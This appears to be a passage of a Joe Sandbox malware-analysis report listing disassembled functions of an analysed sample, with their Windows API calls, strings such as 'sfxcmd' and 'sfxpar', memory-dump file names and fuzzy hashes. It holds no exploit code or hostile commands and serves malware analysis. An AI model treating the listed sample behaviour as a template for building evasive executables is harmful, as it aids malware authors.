GetLastError.KERNEL32(?,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D9ADB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 4cc4bf3a66ccb74e753de068f27360ce65fa2fdcd779dc7d3688da06a97198cc
Instruction ID: ea42e4165e179bdc80881cd11b771350e3a308911589b6b7e289376fa6228bfc
Opcode Fuzzy Hash: 4cc4bf3a66ccb74e753de068f27360ce65fa2fdcd779dc7d3688da06a97198cc
Instruction Fuzzy Hash: CE414631544B46AFE3209B20CC09BDABBE4BB45324F10471BF6E4962D1E779A988CB91

Function 007EAC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
IsDialogMessageW.USER32(00070332,?), ref: 007EACAA
TranslateMessage.USER32(?), ref: 007EACB8
DispatchMessageW.USER32(?), ref: 007EACC2

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: e42dab8ae4ea41955e3c67c8e7750f2541239adcefba0df816f2fbb0f034ef8f
Instruction ID: 5244cfffa112e58e66393479fa7a8fb58d63dbaa7845d6c3ca0b634fa2aa54f9
Opcode Fuzzy Hash: e42dab8ae4ea41955e3c67c8e7750f2541239adcefba0df816f2fbb0f034ef8f
Instruction Fuzzy Hash: C4F01D71902229AB8B249BE2AC4CDEB7F6CFE452517404915F405D2110EA28E409CBB1

Function 007EA2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 007EA2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 007EA315

Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007EA305

Strings

EDIT, xrefs: 007EA2E9, 007EA2F4, 007EA301

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 32c43e1d18cb0209b303c84f2ebe609ad5e1641c9ffd90f8c244a690043d7094
Instruction ID: 97872541de9ad8db66a0caf6d2bd67ebb0e2778282fe2dab56aad7f11f50fedd
Opcode Fuzzy Hash: 32c43e1d18cb0209b303c84f2ebe609ad5e1641c9ffd90f8c244a690043d7094
Instruction Fuzzy Hash: 32F02732B0262877E7305665AC09FDB736CAF8AB00F440062BE04E3180D764AD45C6F6

Function 007ED287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ED29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ED2D9

Strings

sfxpar, xrefs: 007ED2D4
sfxcmd, xrefs: 007ED298

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 5eaa54d3afa66ae0d2aac7d2bd61815a0cece5a51753bf7ecd254ce006cd32ce
Instruction ID: 39a729d5a8852a8de155c25a376a780a5a479bcbe192e552686b249802a0bc54
Opcode Fuzzy Hash: 5eaa54d3afa66ae0d2aac7d2bd61815a0cece5a51753bf7ecd254ce006cd32ce
Instruction Fuzzy Hash: 5EF0A072802628E7DB306F919C1AABE7B6CFF0DB41B044412FD89A6241D668CD40DAF1

Function 007D984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007D985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 007D9876
GetLastError.KERNEL32 ref: 007D98A8
GetLastError.KERNEL32 ref: 007D98C7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: e8790be8cf1908fe03959298c44faff17b9597a17f1afe0b24dfbeccceae6459
Instruction ID: 746c4741fa008068473f36ddc1fd8c75d81c6045db72c7e7d464b9f1575d7333
Opcode Fuzzy Hash: e8790be8cf1908fe03959298c44faff17b9597a17f1afe0b24dfbeccceae6459
Instruction Fuzzy Hash: 2E118E31900604EFDB205B51C804A797BBDFB46B31F14C52BFA6A86790D77D9E40AF51

Function 007FA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007F3713,00000000,00000000,?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue), ref: 007FA526
GetLastError.KERNEL32(?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue,00807348,00807350,00000000,00000364,?,007F9077), ref: 007FA532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007FA49B,007F3713,00000000,00000000,00000000,?,007FA698,00000006,FlsSetValue,00807348,00807350,00000000), ref: 007FA540

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 461713c512444317e2a5e6f87e240bd0c8db7ae1dd39b4818c9275821646ba16
Instruction ID: af4beab95fa9936aade42eeab0c04a2c7636275d8bf972fd3e9a8c9ca7cbcd01
Opcode Fuzzy Hash: 461713c512444317e2a5e6f87e240bd0c8db7ae1dd39b4818c9275821646ba16
Instruction Fuzzy Hash: 8A01F7B661522AFBCB218B689C44A767B9CBF45BA1B200521FA0ED7340D729D920C6E1

Function 007D9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,007DCC94,00000001,?,?,?,00000000,007E4ECD,?,?,?), ref: 007D9F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,007E4ECD,?,?,?,?,?,007E4972,?), ref: 007D9F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,007DCC94,00000001,?,?), ref: 007D9FB8

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: b742189fdc1e694734c07464e3946058c7c7d388f92efa123d296f7a45351084
Instruction ID: ad1e375dcdb436fe0457dd8271f8a896edba74f9ab587f4aa498106fb0209be5
Opcode Fuzzy Hash: b742189fdc1e694734c07464e3946058c7c7d388f92efa123d296f7a45351084
Instruction Fuzzy Hash: 75310271608305ABDF109F24D948B6ABBB8FB40710F044A5AFA85DB381C778D948CBA2

Function 007DA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA261
GetLastError.KERNEL32(?,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA27E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: c93e5b275bdfef90cbeeadaf549a6144b587bbd7ea8bb9355b64ea04abb4790a
Instruction ID: 6df61aff43e535a5f05f4d9f723bf0b96f886077af208283dc7c5dc16ae70a32
Opcode Fuzzy Hash: c93e5b275bdfef90cbeeadaf549a6144b587bbd7ea8bb9355b64ea04abb4790a
Instruction Fuzzy Hash: F401D231581618B6DB32ABB64C09FEE337CBF4A741F040457F840D5251CB6EEA4086B3

Function 007FAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007FB019

Strings

, xrefs: 007FB05E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 5926b0c0994d8a726316859fc756aba62f826a30ba56096e2bea2ccdb5bcc2b9
Instruction ID: 6a76ad0105e9acdcba8d65c60cc0fc501cd89bb6ab461c110d36e957b4e5a86c
Opcode Fuzzy Hash: 5926b0c0994d8a726316859fc756aba62f826a30ba56096e2bea2ccdb5bcc2b9
Instruction Fuzzy Hash: D8410A7050434C9ADF218E64CC94BF7BBAEEB45304F2404EDE69A87242E7399E45DF60

Function 007FA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 007FA79D

Strings

LCMapStringEx, xrefs: 007FA73D, 007FA747

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 726c6422d1a3fc4f52ae972477917c4b186a0da6a9f89a02840860932217ca47
Instruction ID: 715ce19f9d0709159799cf4d9e225d568e96051ec86962175e53238416e4cb08
Opcode Fuzzy Hash: 726c6422d1a3fc4f52ae972477917c4b186a0da6a9f89a02840860932217ca47
Instruction Fuzzy Hash: B601137260020CBBCF126FA4DC05DAE3F66FF08750F054114FE2866260CA3A9A31EBA1

Function 007FA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007F9D2F), ref: 007FA715

Strings

InitializeCriticalSectionEx, xrefs: 007FA6E5

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 5b181d940242ae6a5140f9355c7c44bfd232f0124d6f5f7a077b80c8d4c03000
Instruction ID: 815fbaed747241712213ac70f771041d86c2a83237b11ca3fcf02542361f70a5
Opcode Fuzzy Hash: 5b181d940242ae6a5140f9355c7c44bfd232f0124d6f5f7a077b80c8d4c03000
Instruction Fuzzy Hash: B0F0BE71A4521CBBCB116F64DC09CAE7F65FF18720B408064FD295A3A0DA765A10EBA1

Function 007FA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 007FA5AE

Strings

FlsAlloc, xrefs: 007FA58A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 27bebec22ef556cfbb25b73e8a9a592e00632e6877c05cf0bbeb5961ff3858f6
Instruction ID: 5939405927326e38afb5691d40f82675eb530c38f730e21af8fcf6e4c407e683
Opcode Fuzzy Hash: 27bebec22ef556cfbb25b73e8a9a592e00632e6877c05cf0bbeb5961ff3858f6
Instruction Fuzzy Hash: E6E055B0B4522CBBD3146B649C068BEBB54EF28711B410118FC1997390DD791E0096E6

Function 007F329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 007F32AF

Strings

FlsAlloc, xrefs: 007F329E, 007F32A8

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 8761c11851196a73141a80808de64b7e2ba872247053d3b263753514f7ffa23e
Instruction ID: c25f51442a3f4eaf0e5ff3ab02a032a4bacde5dc32be137d6c9be722671f93f7
Opcode Fuzzy Hash: 8761c11851196a73141a80808de64b7e2ba872247053d3b263753514f7ffa23e
Instruction Fuzzy Hash: FCD0C221781A39AAC55032856C029BB7B44EB01BB2B450252FF289A382A46A491045F5

Function 007EE1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EE20B

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Strings

3Ro, xrefs: 007EE1F9, 007EE205

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 57c5623bee081f4b1880f2f640c033078fc296638c2fae346c6fe8ba4f004c17
Instruction ID: cd5cc96f415ee0e808f4d3890acb1cd7ce36d9d4d278bbcfbe2d1a2fea694a90
Opcode Fuzzy Hash: 57c5623bee081f4b1880f2f640c033078fc296638c2fae346c6fe8ba4f004c17
Instruction Fuzzy Hash: ABB012A126F441BC320C5143BD1AC36031CE4C4B50330C41AB325D41C095889D0D4032

Function 007FB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 007FAF1B: GetOEMCP.KERNEL32(00000000,?,?,007FB1A5,?), ref: 007FAF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007FB1EA,?,00000000), ref: 007FB3C4
GetCPInfo.KERNEL32(00000000,007FB1EA,?,?,?,007FB1EA,?,00000000), ref: 007FB3D7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: d803e7d98fcfca98c033b67878b985d70000b4dd06357e7136adbfc32b693413
Instruction ID: a6bba8c6207509d416ae257a12ec8bb3a27c7f2f6e4d8253dea99d4abf8faaad
Opcode Fuzzy Hash: d803e7d98fcfca98c033b67878b985d70000b4dd06357e7136adbfc32b693413
Instruction Fuzzy Hash: B55140B0A002899EDB20CF31C8856BABBE5EF44310F18846ED2868B353D33D9946CB90

Function 007D1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D1385

Part of subcall function 007D6057: __EH_prolog.LIBCMT ref: 007D605C

Part of subcall function 007DC827: __EH_prolog.LIBCMT ref: 007DC82C
Part of subcall function 007DC827: new.LIBCMT ref: 007DC86F
Part of subcall function 007DC827: new.LIBCMT ref: 007DC893

new.LIBCMT ref: 007D13FE

Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e7977358b1eec29a610ca3ecdd0fec0450f832abc08cf4b5bc220cef085cf9c3
Instruction ID: 6f33cdd7b969b0bfb0017989d4411af0190c7222267ad6a689dbbf00d5b4d345
Opcode Fuzzy Hash: e7977358b1eec29a610ca3ecdd0fec0450f832abc08cf4b5bc220cef085cf9c3
Instruction Fuzzy Hash: 384116B0905B40DED724DF7984899E6FAF5FF18300F504A2ED6EE83282DB366554CB11

Function 007D1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D1385

Part of subcall function 007D6057: __EH_prolog.LIBCMT ref: 007D605C

Part of subcall function 007DC827: __EH_prolog.LIBCMT ref: 007DC82C
Part of subcall function 007DC827: new.LIBCMT ref: 007DC86F
Part of subcall function 007DC827: new.LIBCMT ref: 007DC893

new.LIBCMT ref: 007D13FE

Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

